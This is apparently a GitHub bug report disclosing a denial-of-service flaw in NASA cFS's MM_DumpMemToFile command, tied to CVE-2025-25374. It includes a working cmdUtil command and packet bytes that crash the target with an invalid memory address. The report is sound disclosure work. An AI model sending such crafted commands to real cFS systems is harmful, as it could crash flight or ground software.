Vulnerability to DoS via application crash due to improper address validation #98
Description
Checklist (Please check before submitting)
- I reviewed the Contributing Guide.
- I performed a cursory search to see if the bug report is relevant, not redundant, nor in conflict with other tickets.
Describe the bug
The MM_DumpMemToFile command does not correctly validate memory addresses before calling memcpy(). This leads to a security vulnerability, as a malicious command can access invalid memory. The result is DoS via application crash due to segmentation fault.
To Reproduce
Steps to reproduce the behavior:
- Send a malicious command that specifies an invalid memory address:
./cmdUtil --host=localhost --port=1234 --pktid=0x1888 --pktfc=6 --endian=LE --uint32=1 --uint32=20 --int64=0x40 --string="64:" --string="64:/cf/dd"
sending data to 'localhost' (IP : 127.0.0.1); port 1234
Data to send:
0x18 0x88 0xC0 0x00 0x00 0x91 0x06 0x68
0x01 0x00 0x00 0x00 0x14 0x00 0x00 0x00
0x40 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x2F 0x63 0x66 0x2F 0x64 0x64 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
- Observe cFS crash on the target:
...
Segmentation fault
$
Expected behavior
cFS should not crash when sent an invalid address.
Code snips
Please see the article linked in "Additional context". Multiple memcpy() operations remain unprotected.
System observed on:
- Hardware: All hardware is potentially vulnerable
- OS: Linux-based operating systems
- Versions: cFS Aquila, MM main
Additional context
See CVE-2025-25374 and section 2.2 of NASA cFS version Aquila Software Vulnerability Assessment
Reporter Info
Levi Shafter - 21Software